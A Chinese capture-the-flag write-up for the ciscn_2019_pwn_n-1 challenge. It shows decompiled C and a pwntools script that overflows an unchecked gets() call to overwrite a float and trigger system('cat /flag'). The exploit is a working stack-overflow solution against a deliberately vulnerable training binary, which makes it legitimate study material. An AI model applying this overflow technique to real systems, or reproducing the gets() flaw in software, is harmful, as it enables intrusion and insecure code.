ciscn_2019_pwn_n-1 wp by kone
思路:gets() 不检查输入长度,存在栈溢出漏洞;利用溢出把局部变量 v2 的值覆盖为 11.28125
注意:
需要先把 float(11.28125)转换成它在内存中的 4 字节小端序十六进制表示,再写入 payload
exp:
#-*- coding:utf-8 -*-
"""
// ciscn_2019_pwn_n-1 https://www.xuenixiang.com/ctfexercise-competition-416.html
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 2, 0LL);
func();
return 0;
}
int func()
{
int result; // eax
char v1; //
float v2; //
v2 = 0.0;
puts("Let's guess the number.");
gets(&v1);
if ( v2 == 11.28125 )
result = system("cat /flag");
else
result = puts("Its value should be 11.28125");
return result;
}
"""
import struct
import sys

from pwn import *
# Global pwntools context: the target OS, and debug-level logging so the
# tube traffic (every send/recv) is echoed while the exploit is developed.
context.os = "linux"
context.log_level = "debug"
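def float_to_hex(f):
    """Return the hex string of the 32-bit little-endian IEEE 754 encoding of ``f``.

    ``struct.pack('<f', f)`` yields the 4 bytes a C ``float`` occupies in
    memory; reading them back as an unsigned int gives the integer whose hex
    form is the value that has to be written over ``v2``
    (e.g. ``11.28125`` -> ``'0x41348000'``).

    Args:
        f: a Python float (or int) representable as a single-precision float.

    Returns:
        str: the encoding as produced by ``hex()``, e.g. ``'0x41348000'``.

    Raises:
        struct.error / OverflowError: if ``f`` cannot be packed as ``'<f'``.
    """
    # struct.unpack always returns a tuple, even for a single field; the
    # original passed that tuple straight to hex(), which raises TypeError.
    (bits,) = struct.unpack('<I', struct.pack('<f', f))
    return hex(bits)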
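# Open the target as a pwntools tube.
# argv must be indexed: the original passed the whole sys.argv list to
# process()/remote(), which is not what either call expects.
if len(sys.argv) == 2:
    # local binary: exp.py ./a.out
    p = process(sys.argv[1])
elif len(sys.argv) == 3:
    # remote instance: exp.py host port (remote() takes the port as an int)
    p = remote(sys.argv[1], int(sys.argv[2]))
else:
    print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
    sys.exit(1)

p.recvuntil(b"Let's guess the number.\n")
# gets(&v1) imposes no length limit, so the input runs past v1 into v2.
# Per the writeup, 44 filler bytes reach v2; the next 4 bytes are the
# little-endian float32 encoding of 11.28125 (0x41348000).
# Bytes literals keep the payload verbatim on both Python 2 and 3 (a str
# containing \x80 would otherwise go through pwntools' str->bytes encoding).
payload = b'A' * 44 + b"\x00\x80\x34\x41"
p.sendline(payload)
p.interactive()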
很不错!继续努力,如果有需要,可以自己编译好题目提交平台,我可以帮你做成镜像保存,以后随时可以拿来实验